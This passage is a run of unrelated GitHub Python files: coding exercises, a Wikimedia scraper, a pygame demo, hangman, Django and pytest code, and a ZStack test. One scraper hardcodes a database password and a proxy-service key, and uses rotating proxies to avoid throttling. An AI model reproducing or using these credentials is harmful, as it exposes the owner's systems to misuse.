1->1->2->3->3\n# Output: 1->2->3\n# \n# \n#\n# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, x):\n# self.val = x\n# self.next = None\n\nclass Solution:\n # def deleteDuplicates(self, head: ListNode) -> ListNode:\n def deleteDuplicates(self, head):\n if not head:\n return None\n n = head\n while n and n.next:\n if n.val == n.next.val:\n if n.next.next:\n n.next = n.next.next\n else:\n n.next = None\n else:\n n = n.next\n return head\n\n\n\n","repo_name":"nickyfoto/lc","sub_path":"python/83.remove-duplicates-from-sorted-list.py","file_name":"83.remove-duplicates-from-sorted-list.py","file_ext":"py","file_size_in_byte":1083,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"19453127932","text":"from selenium import webdriver\nfrom selenium.webdriver.chrome.service import Service\nfrom webdriver_manager.chrome import ChromeDriverManager\n\nfrom selenium.webdriver.common.by import By\n\nimport time\n\ntravel = 'https://commons.wikimedia.org/w/index.php?title=Special:ListFiles&limit=500&user=Designermadsen'\nhome = 'https://commons.wikimedia.org/wiki/Main_Page'\n\n\nred_url = 'https://commons.wikimedia.org/wiki/'\nlengthOfRed = len(red_url)\n\nFound = []\n\n\ndef print_result():\n global Found, lengthOfRed\n\n print('size:')\n print(len(Found))\n\n for e in Found:\n print(e[lengthOfRed:])\n\n\ndef is_in_found( value ):\n global Found\n\n for 
e in Found:\n if str(e) == str(value):\n return True\n\n return False\n\n\ndef file_format_png(link):\n StrVal = str(link).lower()\n\n if '.png' in StrVal:\n return True\n\n return False\n\n\ndef file_format_jpeg(link):\n StrVal = str(link).lower()\n\n if '.jpeg' in StrVal:\n return True\n\n if '.jpg' in StrVal:\n return True\n\n return False\n\n\ndef only_file(link):\n StrVal = str(link).lower()\n\n if 'file:' in StrVal:\n return True\n\n return False\n\n\ndef find_links(driver):\n global lengthOfRed, Found\n found_elements = driver.find_elements(By.TAG_NAME, 'a')\n\n for e in found_elements:\n href = e.get_attribute('href')\n\n if not href is None:\n if only_file(href):\n sliced = str(href)\n\n if not is_in_found( sliced ):\n Found.append( sliced )\n\n\ndef main():\n global travel\n\n DriverService = Service(ChromeDriverManager().install())\n Driver = webdriver.Chrome(service=DriverService)\n\n Driver.get(travel)\n stop = False\n\n while not stop:\n found = Driver.find_elements(By.TAG_NAME, 'a')\n\n find_links(Driver)\n time.sleep(5)\n\n # Get State\n for eF in found:\n if eF.get_attribute( 'class' ) == 'oo-ui-buttonElement-button':\n if eF.text == 'Next page':\n if eF.get_attribute('aria-disabled') == 'true':\n stop = True\n break\n else:\n eF.click()\n break\n\n print_result()\n\n\n\nif __name__ == '__main__':\n main()","repo_name":"KentMadsen-Hobby/Wikicommons-Bot","sub_path":"collect/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":2289,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"10175909734","text":"from composabl.core import Agent, Skill, Sensor, Scenario\nfrom composabl.ray import Runtime\nfrom teacher import CSTRTeacher\n\nfrom composabl import Controller\n\nimport os\nimport numpy as np\n\nos.environ[\"COMPOSABL_EULA_AGREED\"] = \"1\"\nlicense_key = os.environ[\"COMPOSABL_LICENSE\"]\n\n\ndef start():\n T = Sensor(\"T\", \"\")\n Tc = Sensor(\"Tc\", \"\")\n Ca = Sensor(\"Ca\", \"\")\n Cref = Sensor(\"Cref\", \"\")\n Tref = Sensor(\"Tref\", \"\")\n\n sensors = [T, Tc, Ca, Cref, Tref]\n\n # Cref_signal is a configuration variable for Concentration and Temperature setpoints\n control_scenarios = [\n {\n \"Cref_signal\": \"complete\",\n \"noise_percentage\": 0.0\n }\n ]\n\n control_skill = Skill(\"control\", CSTRTeacher)\n for scenario_dict in control_scenarios:\n control_skill.add_scenario(Scenario(scenario_dict))\n\n config = {\n \"license\": license_key,\n \"target\": {\n \"local\": {\n \"address\": \"localhost:1337\"\n }\n },\n \"env\": {\n \"name\": \"sim-cstr\",\n },\n\n \"flags\": {\n \"print_debug_info\": True\n },\n }\n\n runtime = Runtime(config)\n agent = Agent()\n agent.add_sensors(sensors)\n\n agent.add_skill(control_skill)\n\n checkpoint_path = './cstr/skill_group_drl_mpc/saved_agents/'\n\n try:\n files = os.listdir(PATH_CHECKPOINTS)\n\n if '.DS_Store' in files:\n files.remove('.DS_Store')\n os.remove(PATH_CHECKPOINTS + '/.DS_Store')\n\n if len(files) > 0:\n agent.load(PATH_CHECKPOINTS)\n\n except Exception:\n os.mkdir(PATH_CHECKPOINTS)\n\n runtime.train(agent, train_iters=1)\n\n #save agent\n agent.export(checkpoint_path)\n\nif __name__ == \"__main__\":\n start()\n","repo_name":"Composabl/examples.composabl.io","sub_path":"agents/cstr/skill_group_drl_mpc/agent.py","file_name":"agent.py","file_ext":"py","file_size_in_byte":1755,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"16"} +{"seq_id":"26330833662","text":"# -*- encoding: utf-8 
-*-\n#!/usr/bin/env python\n\n###\n# hello world\n###\n\n# 指定图像文件名称\nbackground_image_filename = '../images/sushiplate.jpg'\nmouse_image_filename = '../images/fugu.png'\n\n# 导入pygame库\nimport pygame\n# 导入一些常用的函数和常量\nfrom pygame.locals import *\n# 向sys模块借一个exit函数用来退出程序\nfrom sys import exit\n# 初始化pygame,为使用硬件做准备\npygame.init()\n\n'''\n创建了一个窗口\nset_mode会返回一个Surface对象,代表了在桌面上出现的那个窗口,\n三个参数第一个为元祖,代表分辨率(必须);第二个是一个标志位,具体意思见下表,如果不用什么特性,就指定0;第三个为色深。\n标志位\t功能\nFULLSCREEN\t创建一个全屏窗口\nDOUBLEBUF\t创建一个“双缓冲”窗口,建议在HWSURFACE或者OPENGL时使用\nHWSURFACE\t创建一个硬件加速的窗口,必须和FULLSCREEN同时使用\nOPENGL\t创建一个OPENGL渲染的窗口\nRESIZABLE\t创建一个可以改变大小的窗口\nNOFRAME\t创建一个没有边框的窗口\n'''\nscreen = pygame.display.set_mode((640, 480), 0, 32)\n# 设置窗口标题\npygame.display.set_caption(\"Hello, World!\")\n# 加载并转换图像\n# convert函数是将图像数据都转化为Surface对象,每次加载完图像以后就应该做这件事件(事实上因为 它太常用了,如果你不写pygame也会帮你做);\n# convert_alpha相比convert,保留了Alpha 通道信息(可以简单理解为透明的部分),这样我们的光标才可以是不规则的���状。\nbackground = pygame.image.load(background_image_filename).convert()\nmouse_cursor = pygame.image.load(mouse_image_filename).convert_alpha()\n\nwhile True:\n for event in pygame.event.get():\n if event.type == QUIT:\n exit()\n\n # 将背景图画上去\n # blit是个重要函数,第一个参数为一个Surface对象,第二个为左上角位置。\n screen.blit(background, (0,0))\n\n # 获得鼠标位置\n x, y = pygame.mouse.get_pos()\n \n # 计算光标的左上角位置\n x -= mouse_cursor.get_width() / 2\n y -= mouse_cursor.get_height() / 2\n \n # 把光标画上去\n screen.blit(mouse_cursor, (x, y))\n\n # 刷新一下画面(画完以后一定记得用update更新一下,否则画面一片漆黑。)\n pygame.display.update()","repo_name":"yanlinpu/information","sub_path":"python/pygames/lession1/hello_world.py","file_name":"hello_world.py","file_ext":"py","file_size_in_byte":2346,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"18496590644","text":"import NASprintsimulation as chat\r\nfrom utils import Video as UV\r\nfrom ExcelWrite import FileWrite as Write\r\nimport search\r\n\r\nToRename = []\r\nNamed = []\r\nother = []\r\nsortlist = []\r\nduplicate = []\r\noptional = []\r\nsortlength = 0\r\n\r\n\r\n\r\ni = 0\r\ndef AddSort(item):\r\n sortlist.append(item)\r\nclass Sorter:\r\n def main():\r\n sortlength = len(sortlist)\r\n print(\"Sorting: \" + str(sortlength)+ \" Files\")\r\n for i in range(0,sortlength):\r\n item = sortlist[i]\r\n Video,Extention = UV.Converter(item)\r\n exsits = UV.Revew.exsits(Video)\r\n if exsits:\r\n print(\"Item \"+ str(i+1) + \"/\"+str(sortlength)+ \" : \" + Video + \" : Already Exsits\")\r\n \r\n else:\r\n print(\"Item \"+ str(i+1) + \"/\"+str(sortlength)+ \" : \" + Video + \" : Doesnt Exsit\")\r\n Write(item,Extention)\r\n chat.Message(\"General\", \"Python Search Completed\")\r\n \r\n\r\nif __name__ == \"__main__\":\r\n search.run()","repo_name":"EmilyJonesAMST/AMST-Project","sub_path":"sorter.py","file_name":"sorter.py","file_ext":"py","file_size_in_byte":993,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"14699037040","text":"from sys import *\r\n\r\ndef main():\r\n print(\"number of cmd line arguments are:\",len(argv))\r\n print(\"Name of application is :\",argv[0])\r\n \r\n for data in argv:\r\n print(data)\r\n \r\nif __name__==\"__main__\":\r\n main()","repo_name":"PrachiBorawake/Python_codes","sub_path":"Assignment2/cmd1.py","file_name":"cmd1.py","file_ext":"py","file_size_in_byte":235,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"18621600420","text":"import random\nfrom datetime import datetime\n\nimport requests\nimport 
redis\nimport pymysql\n\n# 链接MySQL数据库\nconn = pymysql.Connect(host='10.10.107.7', user='root', password='xinqian@saibao', database='bigdata', port=3306)\ncursor = conn.cursor()\n# 链接Redis数据库\nredisDB = redis.Redis(host='127.0.0.1', port=6379, db=2)\n# 固定资产投资完成额变化\nredis_dict_key = 'ods_cnncnybgdzctzwcebhyd'\n\n\n# 获取讯代理IP\ndef getIp():\n xdl_url = 'http://api.xdaili.cn/xdaili-api//greatRecharge/getGreatIp?spiderId=913d4f4b67e24be0998a3eb344ff732b&orderno=YZ2021923652gUFZCj&returnType=2&count=10'\n ipListData = requests.get(url=xdl_url).json()\n ipList = []\n ipList.clear()\n # 将ip以字典的形式添加至ip池\n for everyIp in ipListData['RESULT']:\n ipList.append({\n 'ip': everyIp['ip'],\n 'port': everyIp['port']\n })\n return ipList\n\n\ndef insertMysql(item):\n if redisDB.hexists(redis_dict_key, item['completedInvestmentInFixedAssets'] + '-' + item['Ctime'] + '-' + item[\n 'primaryIndustry']):\n print('已存在该值,不作处理...')\n else:\n redisDB.hset(redis_dict_key, item['completedInvestmentInFixedAssets'] + '-' + item['Ctime'] + '-' + item[\n 'primaryIndustry'], 0)\n sql = 'insert into ods_chinanongcunnongyebugdzctzwcebhyd(classification,completedInvestmentInFixedAssets,Ctime,primaryIndustry,theSecondaryIndustry,theTertiaryIndustry,unit,insertTime)values (%s,%s,%s,%s,%s,%s,%s,%s)'\n cursor.execute(sql, (item['classification'],\n item['completedInvestmentInFixedAssets'], item['Ctime'], item['primaryIndustry'],\n item['theSecondaryIndustry'],\n item['theTertiaryIndustry'], item['unit'], item['insertTime']))\n print('正在插入数据,请稍等...')\n conn.commit()\n\n\ndef getData():\n url = 'http://zdscxx.moa.gov.cn:8080/nyb/qggdzctz'\n item = {}\n headers = {\n 'Referer': 'http://zdscxx.moa.gov.cn:8080/nyb/pc/index.jsp',\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.8 Safari/537.36',\n 'X-Requested-With': 'XMLHttpRequest',\n }\n data = {\n 'item': '月度'\n }\n ip = random.choice(ipList)\n response = requests.post(url=url, headers=headers, data=data,\n proxies={'http': 'http://' + ip['ip'] + ':' + ip['port']}).json()['result']['rowDatas']\n item['classification'] = '月度'\n for perData in response:\n # 固定资产投资完成额\n item['completedInvestmentInFixedAssets'] = perData['固定资产投资完成额']\n # 时间\n item['Ctime'] = perData['时间']\n try:\n # 第一产业\n item['primaryIndustry'] = perData['第一产业']\n except:\n item['primaryIndustry'] = ''\n try:\n # 第二产业\n item['theSecondaryIndustry'] = perData['第二产业']\n except:\n item['theSecondaryIndustry'] = ''\n try:\n # 第三产业\n item['theTertiaryIndustry'] = perData['第三产业']\n except:\n item['theTertiaryIndustry'] = ''\n # 单位\n item['unit'] = '亿元'\n # 插入时间\n item['insertTime'] = datetime.now().strftime('%Y-%m-%d %H:%M:%S')\n insertMysql(item)\n\n\nif __name__ == '__main__':\n ipList = getIp()\n getData()\n cursor.close()\n conn.close()\n","repo_name":"CuiXiangTuT/MyProject","sub_path":"WebCrawler/中华人民共和国农业农村部/2_宏观经济_固定资产投资完成额变化月度.py","file_name":"2_宏观经济_固定资产投资完成额变化月度.py","file_ext":"py","file_size_in_byte":3538,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"17692541762","text":"import pyglet\nfrom pyglet import shapes\nimport string\nimport random\n\nwindow = pyglet.window.Window(width=1280, height=720)\n\nclass Game:\n def __init__(self, correct_word):\n self.correct_word = correct_word\n self.word = ['_' for _ in self.correct_word]\n self.word_label = pyglet.text.Label()\n\n self.wrong_attemps = list()\n self.wrong_attemps_label = pyglet.text.Label()\n\n self.hang = pyglet.graphics.Batch()\n 
self.hangman = pyglet.graphics.Batch()\n\n self.__update_label()\n\n def __update_label(self):\n self.word_label = pyglet.text.Label(\n ''.join(self.word),\n font_name = 'Fira Code',\n font_size = 36,\n x = window.width // 2,\n y = window.height // 2,\n anchor_x = 'center',\n anchor_y = 'center'\n )\n\n self.wrong_attemps_label = pyglet.text.Label(\n ''.join(self.wrong_attemps),\n font_name = 'Fira Code',\n font_size = 36,\n x = window.width // 2,\n y = window.height // 2 - 220,\n anchor_x = 'center',\n anchor_y = 'center'\n )\n\n def key_pressed(self, letter):\n if letter in self.word or letter in self.wrong_attemps:\n return\n\n match = False\n for i in range(len(self.correct_word)):\n if self.correct_word[i] == letter:\n self.word[i] = letter\n match = True\n\n if not match:\n self.wrong_attemps.append(letter)\n\n self.__update_label()\n\n def draw_hang(self):\n x = window.width // 2 - 300\n y = window.height // 2 - 120\n\n line_1 = shapes.Line(x, y, x, y + 300, width=5, color=(255, 255, 255), batch=self.hang)\n line_2 = shapes.Line(x, y + 300, x + 100, y + 300, width=5, color=(255, 255, 255), batch=self.hang)\n line_3 = shapes.Line(x + 100, y + 300, x + 100, y + 270, width=5, color=(255, 255, 255), batch=self.hang)\n\n self.hang.draw()\n\n def draw_hangman(self):\n x = window.width // 2 - 200\n y = window.height // 2 + 120\n\n wrong_count = len(self.wrong_attemps)\n\n if wrong_count > 0:\n head = shapes.Circle(x, y, 30, color=(255, 255, 255), batch=self.hangman)\n\n if wrong_count > 1:\n body = shapes.Line(x, y, x, y - 120, width=5, color=(255, 255, 255), batch=self.hangman)\n\n if wrong_count > 2:\n arm_1 = shapes.Line(x, y - 50, x - 40, y - 100, width=5, color=(255, 255, 255), batch=self.hangman)\n\n if wrong_count > 3:\n arm_2 = shapes.Line(x, y - 50, x + 40, y - 100, width=5, color=(255, 255, 255), batch=self.hangman)\n\n if wrong_count > 4:\n leg_1 = shapes.Line(x, y - 120, x - 40, y - 200, width=5, color=(255, 255, 255), batch=self.hangman)\n\n if wrong_count > 5:\n leg_2 = shapes.Line(x, y - 120, x + 40, y - 200, width=5, color=(255, 255, 255), batch=self.hangman)\n\n self.hangman.draw()\n\n def run(self):\n self.draw_hang()\n self.draw_hangman()\n self.word_label.draw()\n self.wrong_attemps_label.draw()\n\n if not '_' in self.word:\n window.clear()\n pyglet.text.Label(\n 'You Win',\n font_name='Fira Code',\n font_size=56,\n x = window.width // 2,\n y = window.height // 2,\n anchor_x = 'center',\n anchor_y = 'center'\n ).draw()\n\n if len(self.wrong_attemps) >= 6:\n window.clear()\n pyglet.text.Label(\n 'Game Over',\n font_name='Fira Code',\n font_size=56,\n x = window.width // 2,\n y = window.height // 2,\n anchor_x = 'center',\n anchor_y = 'center'\n ).draw()\n pass\n\nselected_word = \"\"\nwith open('words.txt') as f:\n words = list()\n for word in f.readlines():\n words.append(word[:-1])\n\n selected_word = random.choice(words)\n\ngame = Game(selected_word)\n\n@window.event\ndef on_draw():\n window.clear()\n game.run()\n\n@window.event\ndef on_key_press(symbol, _):\n if chr(symbol) in string.ascii_letters:\n game.key_pressed(chr(symbol).lower())\n\nif __name__ == '__main__':\n pyglet.app.run()\n","repo_name":"1sa4c/hangman","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4407,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"27516112411","text":"\n\ndef separatorMode1(num):\n if num > 99:\n # Numero de 3 digitos.\n centenas = num / 100\n decenas = (num - centenas*100) / 10\n unidades 
= (num - decenas*10) / 1\n \n return unidades,decenas,centenas \n\ndef separatorMode2(num):\n c = (num / 100) % 100\n d = (num / 10) % 10\n u = (num / 1) % 1\n return c, d, u\n\ndef separatorMode3(num):\n if num > 999:\n res = num % 1000\n mil = (num - res) / 1000\n res2 = res % 100\n cen = (res - res2) / 100\n res3 = res2 % 10\n dec = (res2 - res3) / 10\n uni = res3\n \n return mil, cen, dec, uni\n \n if num > 99:\n res = num%100\n cen = (num-(res))/100\n res2 = res % 10\n dec = (res-(res2))/10\n uni = res2\n return cen, dec, uni\n \n[m,c, d, u] = separatorMode3(1235)\n\nprint(m , c , d , u)\n\n","repo_name":"23ft/esp32-micropython-weather-station-MQTT","sub_path":"dec_cent_mil.py","file_name":"dec_cent_mil.py","file_ext":"py","file_size_in_byte":884,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"17717884060","text":"import pytest\nimport uniplot.analysis\nimport uniplot.parse\n\nTEST_UNIPROT=\"./resources/uniprot_sprot_small.xml.gz\"\n\ndef test_hello_world():\n \"\"\"Does nothing useful\"\"\"\n assert True\n\ndef test_average():\n \"\"\"Tests the average length of proteins\"\"\"\n assert uniplot.analysis.average_len(\n uniplot.parse.uniprot_seqrecords(TEST_UNIPROT)\n ) == 302.72222222222223\n","repo_name":"jackbryan1/Biology-Analysis-Project","sub_path":"tests/test_analysis.py","file_name":"test_analysis.py","file_ext":"py","file_size_in_byte":377,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"28936305798","text":"def traj_num(N):\n K = [0, 1] + [0] * N\n for i in range(2, N+1):\n K[i] = K[i-2] + [i-1]\n return K[N]\n\n\ndef count_trajectories(N, allowed:list):\n K = [0, 1, allowed[2]] + [0]*(N-3)\n for i in range(3, N+1):\n if allowed[i]:\n K[i] = K[i-1] + K[i-2] + K[i-3]\n\n\ndef count_min_cost(N, price:list):\n C = [float(\"-inf\"), price[1], price[1]+price[2]]+[0]*(N-2)\n for i in range(3, N+1):\n C[i] = price[i] + min(C[i-1], C[i-2])\n return(C[N])\n\n \n\n\n\n\n\n\n","repo_name":"Hoasker/learning_python","sub_path":"lec_10/dynamic_prog.py","file_name":"dynamic_prog.py","file_ext":"py","file_size_in_byte":496,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"4730036825","text":"import pytest\n\nfrom savoten.domain import Candidate, EventItem, User\nfrom savoten.repository.memory import EventItemRepository\nfrom tests.util import get_public_vars\n\nuser_args = {\n 'name': 'test_user',\n 'email': 'test_user@test.com',\n 'permission': 100\n}\nuser = User(**user_args)\ncandidate_args = {'user': user}\ncandidate = Candidate(**candidate_args)\n\n\nclass TestSave:\n\n def setup_method(self):\n self.repository = EventItemRepository()\n\n @pytest.mark.parametrize('event_item',\n [EventItem('test_name', [candidate])])\n def test_succeeds_when_event_item_has_no_id(self, event_item):\n saved_event_item = self.repository.save(event_item)\n assert get_public_vars(self.repository.event_items[\n saved_event_item.id]) == get_public_vars(event_item)\n\n @pytest.mark.parametrize('event_item, updated_event_item', [(EventItem(\n 'test_name', [candidate]), EventItem('updated', [candidate]))])\n def test_update_succeeds_when_event_item_has_same_id(\n self, event_item, updated_event_item):\n saved_event_item = self.repository.save(event_item)\n updated_event_item.id = saved_event_item.id\n self.repository.save(updated_event_item)\n assert get_public_vars(self.repository.event_items[\n saved_event_item.id]) == 
get_public_vars(updated_event_item)\n\n\nclass TestDelete:\n\n def setup_method(self):\n self.repository = EventItemRepository()\n self.repository.event_items[1] = [\n EventItem('test_name', [candidate], id=1)\n ]\n\n @pytest.fixture()\n def regist_event_item_to_event_id_map(self):\n event_id = 1\n event_item = EventItem('test_name', [candidate], id=1)\n self.repository.event_id_to_event_item_map[event_id] = [event_item]\n\n @pytest.mark.parametrize('event_item',\n [EventItem('test_name', [candidate], id=1)])\n def test_succeeds_when_target_event_item_exists(self, event_item):\n self.repository.delete(event_item)\n\n @pytest.mark.parametrize('event_item, event_id',\n [(EventItem('test_name', [candidate], id=1), 1)])\n def test_succeeds_when_target_event_item_registerd_in_event_id_map(\n self, event_item, event_id, regist_event_item_to_event_id_map):\n self.repository.delete(event_item)\n for registed_event_items \\\n in self.repository.event_id_to_event_item_map.values():\n for registed_event_item in registed_event_items:\n assert event_item.id == registed_event_item.id\n\n @pytest.mark.parametrize('event_item',\n [EventItem('test_name2', [candidate], id=2)])\n def test_return_value_error_when_target_event_item_does_not_exist(\n self, event_item):\n with pytest.raises(ValueError):\n assert self.repository.delete(event_item)\n\n @pytest.mark.parametrize('event_item',\n [EventItem('test_name', [candidate], id=None)])\n def test_return_value_error_when_given_event_item_id_is_none(\n self, event_item):\n with pytest.raises(ValueError):\n assert self.repository.delete(event_item)\n\n\nclass TestFindById:\n\n @classmethod\n def setup_class(cls):\n cls.repository = EventItemRepository()\n cls.repository.event_items[1] = EventItem('test_name', [candidate],\n id=1)\n\n def test_return_event_item_when_target_id_exists(self):\n assert get_public_vars(\n self.repository.find_by_id(1)) == get_public_vars(\n self.repository.event_items[1])\n\n def test_return_none_if_target_id_does_not_exist(self):\n assert self.repository.find_by_id(100) is None\n\n\nclass TestFindByEventId:\n\n @classmethod\n def setup_class(cls):\n cls.repository = EventItemRepository()\n cls.test_event_items = [\n EventItem('test_name', [candidate], id=i) for i in range(1, 5)\n ]\n event_id = 1\n cls.repository.event_id_to_event_item_map[\n event_id] = cls.test_event_items\n\n def test_return_found_event_items_when_target_event_id_exists(self):\n assert set(self.repository.find_by_event_id(1)) == set(\n self.test_event_items)\n\n def test_return_none_when_target_event_item_does_not_exist(self):\n assert self.repository.find_by_event_id(2) is None\n","repo_name":"sato-mh/savoten","sub_path":"tests/unit/repository/test_event_item_repository.py","file_name":"test_event_item_repository.py","file_ext":"py","file_size_in_byte":4444,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"73492165768","text":"\"\"\"RTdemo URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/3.2/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. 
Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.urls import path\nfrom RTdemo import views\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n # path(\"parameter\",views.para_in,name='demo_page'),\n path(\"para_save/\", views.save_parameter, name='para_save'),\n # 显示当前章节名\n path(\"show_chapter/<int:cid>\", views.chapter_name, name='show_chapter'),\n # 按章节填写值\n path(\"filing/<int:chpid>/\", views.load_detail, name='filing'),\n path(\"testfiling/<int:chpid>/\", views.test_load_detail, name='testfiling'),\n\n path(\"\", views.para_in, name='demo'),\n path(\"<int:cid>/\", views.para_in, name='demo'),\n path(\"demo/\", views.para_in_new, name='demo_new'),\n\n # 主题示例页面\n path(\"tooltip/\", views.tooltip, name='tooltip'),\n\n # Excel sheet示例页\n path(\"sheet_demo/\", views.sheet_show, name='sheet_demo'),\n path(\"save_table/\", views.save_table, name='save_table'),\n path(\"csvsheet/\", views.csv_show, name='csvsheet'),\n path(\"test/\", views.test, name='test'),\n path(\"test1/\", views.test1, name='test1'),\n]\n","repo_name":"yqgz/RTdemo","sub_path":"RTdemo/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1698,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"16684445435","text":"from contextlib import suppress\n\nfrom django.core.validators import RegexValidator, _lazy_re_compile\nfrom django.utils.translation import gettext_lazy as _\nfrom rest_framework import serializers\nfrom rest_framework.validators import UniqueTogetherValidator, qs_filter\n\n\nclass UnattachedIssueValidator:\n \"\"\"\n Check a GitHubIssue doesn't have an Epic nor a Task attached\n \"\"\"\n\n requires_context = True\n\n def __call__(self, data, serializer):\n from .models import Epic, Task\n\n issue = data.get(\"issue\")\n if issue is None:\n return\n\n with suppress(Task.DoesNotExist):\n if issue.task != serializer.instance:\n raise serializers.ValidationError(\n {\"issue\": _(\"This issue is already attached to a task\")}\n )\n with suppress(Epic.DoesNotExist):\n if issue.epic != serializer.instance:\n raise serializers.ValidationError(\n {\"issue\": _(\"This issue is already attached to an epic\")}\n )\n\n\nclass CaseInsensitiveUniqueTogetherValidator(UniqueTogetherValidator):\n def process_field_name(self, field_name):\n \"\"\"\n Right now, we presume that certain names are string-y, and can be\n case-insensitive compared.\n \"\"\"\n if field_name == \"name\":\n return \"name__iexact\"\n return field_name\n\n def filter_queryset(self, attrs, queryset, serializer):\n \"\"\"\n Filter the queryset to all instances matching the given attributes.\n \"\"\"\n # This is a modified version of `UniqueTogetherValidator.filter_queryset`,\n # modifed to preprocess field names for case-insensitive matching.\n # It also handles filtering on soft-deletes if appropriate.\n\n # field names => field sources\n sources = [serializer.fields[field_name].source for field_name in self.fields]\n\n # If this is an update, then any unprovided field should\n # have its value set based on the existing instance attribute.\n if serializer.instance is not None:\n for source in sources:\n if source not in attrs:\n attrs[source] = getattr(serializer.instance, source)\n\n if hasattr(queryset, \"active\"):\n queryset = queryset.active()\n # Determine the filter keyword arguments and filter the queryset.\n filter_kwargs = {\n self.process_field_name(source): attrs[source] for source in sources\n }\n 
return qs_filter(queryset, **filter_kwargs)\n\n\nbranch_unicode_re = _lazy_re_compile(r\"^[-\\w/]+\\Z\")\nvalidate_unicode_branch = RegexValidator(\n branch_unicode_re,\n _(\n \"Enter a valid 'branch' consisting of Unicode letters, numbers, underscores, \"\n \"slashes, or hyphens.\"\n ),\n \"invalid\",\n)\n","repo_name":"SFDO-Tooling/Metecho","sub_path":"metecho/api/validators.py","file_name":"validators.py","file_ext":"py","file_size_in_byte":2833,"program_lang":"python","lang":"en","doc_type":"code","stars":41,"dataset":"github-code","pt":"16"} +{"seq_id":"35021610347","text":"import waltz\nfrom configs.config import SERVER\n\nurls = ('/compose/?', 'routes.email.Compose',\n '/emails/(.+)', 'routes.email.Read',\n '/emails/?', 'routes.email.Inbox',\n '/login/?', 'routes.auth.Login',\n '/logout/?', 'routes.auth.Logout',\n '/', 'routes.index.Index')\n\n# Default values for new client sessions\nsession_defaults = {'logged': False,\n 'email': None,\n 'passwd': None,\n 'admin': False,\n }\n\n# Make the following variable and methods available for use within the\n# html templates)\nenv = {'ctx': waltz.web.ctx,\n 'session': waltz.session,\n 'len': len,\n }\n\napp = waltz.setup.dancefloor(urls, globals(), sessions=session_defaults, env=env,\n debug=SERVER['DEBUG_MODE'])\n\nif __name__ == \"__main__\":\n app.run()\n\n","repo_name":"mekarpeles/sendr","sub_path":"sendr/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":872,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"16"} +{"seq_id":"70022278410","text":"def get_sort_indexes(arr):\n arr2 = merge_sorted(arr)\n n = len(arr) - 1\n m = 0\n n_done = False\n m_done = False\n while n != m and not (n_done and m_done):\n if arr[n] == arr2[n]:\n n -= 1\n else:\n n_done = True\n if arr[m] == arr2[m]:\n m += 1\n else:\n m_done = True\n return m, n\n\ndef merge_sorted(arr):\n if len(arr) == 1:\n return arr\n mid = len(arr) // 2\n l = merge_sorted(arr[:mid])\n r = merge_sorted(arr[mid:])\n return merge(l,r)\n\ndef merge(l,r):\n ans = l[:]\n ans.extend(r[:])\n i1 = 0\n i2 = 0\n z = 0\n while i1 < len(l) and i2 < len(r):\n if l[i1] <= r[i2]:\n ans[z] = l[i1]\n i1 += 1\n z += 1\n else:\n ans[z] = r[i2]\n i2 += 1\n z += 1\n while i1 < len(l):\n ans[z] = l[i1]\n i1 += 1\n z += 1\n return ans","repo_name":"angelusualle/algorithms","sub_path":"cracking_the_coding_interview_qs/16.16/get_sort_indexes.py","file_name":"get_sort_indexes.py","file_ext":"py","file_size_in_byte":928,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"36589312844","text":"'''\n\n@author: FangSun\n'''\n\n\nimport zstackwoodpecker.test_lib as test_lib\nimport zstackwoodpecker.test_state as test_state\nimport zstackwoodpecker.test_util as test_util\n\n\ntest_stub = test_lib.lib_get_test_stub()\ntest_obj_dict = test_state.TestStateDict()\n\n\ndef test():\n\n pub_l3_vm, flat_l3_vm, vr_l3_vm = test_stub.generate_pub_test_vm(tbj=test_obj_dict)\n\n flat_vip = test_stub.create_vip('create_flat_vip')\n test_obj_dict.add_vip(flat_vip)\n vr_vip = test_stub.create_vip('create_vr_vip')\n test_obj_dict.add_vip(vr_vip)\n\n test.flat_eip = test_stub.create_eip('create flat eip', vip_uuid=flat_vip.get_vip().uuid,\n vnic_uuid=flat_l3_vm.get_vm().vmNics[0].uuid, vm_obj=flat_l3_vm)\n\n test.vr_eip = test_stub.create_eip('create vr eip', vip_uuid=vr_vip.get_vip().uuid,\n 